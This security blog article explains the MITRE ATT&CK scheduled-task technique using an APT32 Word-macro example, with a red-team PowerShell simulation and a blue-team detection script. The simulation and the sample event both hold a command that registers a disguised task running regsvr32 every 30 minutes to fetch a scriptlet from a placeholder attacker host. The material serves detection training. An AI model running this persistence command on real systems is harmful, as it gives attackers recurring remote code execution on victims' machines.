How to Simulate and Detect MITRE ATT&CK T1053 Scheduled Task/Job Technique
by Süleyman Özarslan, PhD
A scheduled task is a command, program or script to be executed:
- at a particular time in the future (e.g. 11/08/2022 1:00 a.m.)
- at regular intervals (e.g. every Monday at 1:00 a.m.)
- when a defined event occurs (e.g. a user logs on to the system).
Legitimate users such as system administrators use scheduled tasks to create and run operational tasks automatically. Adversaries also use the operating system's task scheduling utilities to execute malicious payloads on a defined schedule or at system startup, giving them persistence. Our research has found that Scheduled Task was the seventh most prevalent MITRE ATT&CK technique used by adversaries in their malware.
Red and Blue Team Exercises
Red Teaming — How to simulate?
In this exercise, we examine a real scheduled task command from a malicious VBA macro in a Word document used by the APT32 threat group.
This payload was included in the following Word document:
Briefly, the below command in the VBA code embedded in the Word document creates a scheduled task named SystemSoundsServices (mimicking the Windows System Sounds service) that runs Regsvr32.exe every 30 minutes.
Regsvr32.exe is a Microsoft-signed binary that application whitelisting typically trusts. Here it is abused to bypass script protections: it executes a Component Object Model (COM) scriptlet that is downloaded dynamically from the given URL, so the malicious logic never has to be dropped as a separate executable that a whitelist would block.
In conclusion, the given code incorporates the following MITRE ATT&CK techniques:
- T1053.005 Scheduled Task/Job: Scheduled Task
- T1036.004 Masquerading: Masquerade Task or Service
- T1218.010 Signed Binary Proxy Execution: Regsvr32
- T1559.001 Inter-Process Communication: Component Object Model
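The command itself is not reproduced on this page, so the following is an added PowerShell simulation of the same behaviour, written for this article rather than taken from the APT32 macro. It assumes the macro registered the task with schtasks.exe; the scriptlet URL is a placeholder for a benign test .sct file that you host yourself, and the task should only be created in an isolated lab:

```powershell
# Added simulation (not the APT32 macro's own code): register the task the way the
# document's payload does, so the resulting telemetry can be collected.
# ASSUMPTIONS: the macro used schtasks.exe; the scriptlet URL below is a placeholder
# for a benign test .sct that you host in an isolated lab.
$TaskName = 'SystemSoundsServices'                  # mimics the Windows System Sounds service (T1036.004)
$SctUrl   = 'http://attacker.example/payload.sct'   # placeholder, not the real APT32 URL

# regsvr32 switches: /s silent, /n skip DllRegisterServer, /u call DllInstall in uninstall mode,
# /i:<url> pass the URL to scrobj.dll's DllInstall, which fetches and runs the COM scriptlet
# (T1218.010 + T1559.001). The DLL itself is never registered.
$Action = "regsvr32.exe /s /n /u /i:$SctUrl scrobj.dll"

# Create the task so that it fires every 30 minutes (T1053.005); /F overwrites an existing
# task of the same name. PowerShell quotes $Action for the native call because it contains spaces.
schtasks.exe /Create /SC MINUTE /MO 30 /TN $TaskName /TR $Action /F

# Confirm what was registered (action, trigger, run-as user), then clean up after the exercise.
schtasks.exe /Query /TN $TaskName /V /FO LIST
# schtasks.exe /Delete /TN $TaskName /F
```

The task runs in the context of the user who created it, which is exactly what a macro launched from Word would get; no elevation is needed, which is part of why this technique is attractive for persistence.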
If you’d like to learn more about MITRE ATT&CK, check out our LinkedIn group with all the latest! https://www.linkedin.com/groups/8955879/
Blue Teaming — How to detect?
A Sigma rule can be used to detect the creation of a scheduled task that runs
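The Sigma rule is not reproduced on this page, so the following is an added PowerShell detection example, not the original rule. It inspects Security event 4698 (A scheduled task was created), whose TaskContent field carries the full task XML, for an action that runs regsvr32.exe against a remote scriptlet, and separately checks process-creation command lines (Security 4688 or Sysmon event 1) for a schtasks /create whose /tr action contains regsvr32. The sample event is constructed for this example, and the list of mimicked service names is an illustrative assumption:

```powershell
# Added detection example (not the page's Sigma rule). Two checks:
#  1. Security 4698: parse the registered task XML for a regsvr32 action that loads a remote scriptlet.
#  2. Process creation (4688 / Sysmon 1): schtasks.exe /create whose /tr action contains regsvr32.
# Task names are also compared with built-in service names they mimic (T1036.004).

# ASSUMPTION: illustrative list; extend it with the service names you see masqueraded.
$MimickedServiceNames = @('SystemSoundsService', 'SystemSoundsServices')

function Test-SuspiciousTaskCreationEvent {
    # Returns an object describing why the 4698 event is suspicious, or $null if it is not.
    param([Parameter(Mandatory)][xml]$EventXml)

    $ns = New-Object System.Xml.XmlNamespaceManager($EventXml.NameTable)
    $ns.AddNamespace('e', 'http://schemas.microsoft.com/win/2004/08/events/event')
    $taskName = $EventXml.SelectSingleNode("//e:Data[@Name='TaskName']", $ns).InnerText
    # TaskContent is the task definition XML embedded as text inside the event XML.
    $taskXml  = [xml]($EventXml.SelectSingleNode("//e:Data[@Name='TaskContent']", $ns).InnerText)

    $tns = New-Object System.Xml.XmlNamespaceManager($taskXml.NameTable)
    $tns.AddNamespace('t', 'http://schemas.microsoft.com/windows/2004/02/mit/task')

    $reasons = [System.Collections.Generic.List[string]]::new()
    foreach ($exec in $taskXml.SelectNodes('//t:Actions/t:Exec', $tns)) {
        $command = $exec.SelectSingleNode('t:Command', $tns).InnerText
        $argNode = $exec.SelectSingleNode('t:Arguments', $tns)
        $arguments = if ($argNode) { $argNode.InnerText } else { '' }
        # -match is case-insensitive by default; /i:http(s):// is the remote-scriptlet signature.
        if ($command -match 'regsvr32(\.exe)?$' -and $arguments -match '/i:\s*https?://') {
            $reasons.Add("regsvr32 action loads a remote scriptlet: $command $arguments")
        }
    }
    $interval = $taskXml.SelectSingleNode('//t:Triggers//t:Repetition/t:Interval', $tns)
    if ($reasons.Count -gt 0 -and $interval) {
        $reasons.Add("action repeats every $($interval.InnerText)")   # e.g. PT30M = every 30 minutes
    }
    $leaf = ($taskName -split '\\')[-1]
    if ($MimickedServiceNames -contains $leaf) {
        $reasons.Add("task name '$leaf' mimics a built-in Windows service")
    }
    if ($reasons.Count -eq 0) { return $null }
    [pscustomobject]@{ TaskName = $taskName; Reasons = $reasons.ToArray() }
}

function Test-SuspiciousSchtasksCommandLine {
    # For 4688 / Sysmon 1 command lines: $true when schtasks creates a task whose action runs regsvr32.
    param([Parameter(Mandatory)][string]$CommandLine)
    ($CommandLine -match 'schtasks(\.exe)?\b' -and
     $CommandLine -match '/create\b' -and
     $CommandLine -match '/tr\s+.*regsvr32')
}

# Constructed sample 4698 event for offline testing. TaskContent is wrapped in CDATA here; the real
# event carries it as escaped text, and InnerText yields the same string either way.
$sampleEvent = [xml]@'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4698</EventID><Computer>WS01.corp.example</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">jdoe</Data>
    <Data Name="TaskName">\SystemSoundsServices</Data>
    <Data Name="TaskContent"><![CDATA[<?xml version="1.0"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT30M</Interval></Repetition>
    <StartBoundary>2022-11-08T01:00:00</StartBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>regsvr32.exe</Command>
    <Arguments>/s /n /u /i:http://attacker.example/payload.sct scrobj.dll</Arguments></Exec></Actions>
</Task>]]></Data>
  </EventData>
</Event>
'@

# Offline checks against constructed input:
Test-SuspiciousTaskCreationEvent -EventXml $sampleEvent | Format-List
Test-SuspiciousSchtasksCommandLine 'schtasks /create /sc minute /mo 30 /tn SystemSoundsServices /tr "regsvr32.exe /s /n /u /i:http://attacker.example/payload.sct scrobj.dll"'

# Live sweep of the Security log. 4698 is only written when the "Audit Other Object Access Events"
# subcategory has success auditing enabled, so confirm that before relying on this source.
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4698 } -ErrorAction SilentlyContinue |
#     ForEach-Object { Test-SuspiciousTaskCreationEvent -EventXml ([xml]$_.ToXml()) }
```

Parsing the task XML from 4698 is more robust than matching on the schtasks command line alone, because a task can also be registered through the Task Scheduler COM API or the ScheduledTasks PowerShell module without schtasks.exe ever running; both paths still produce the 4698 event.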
Originally published at https://www.picussecurity.com.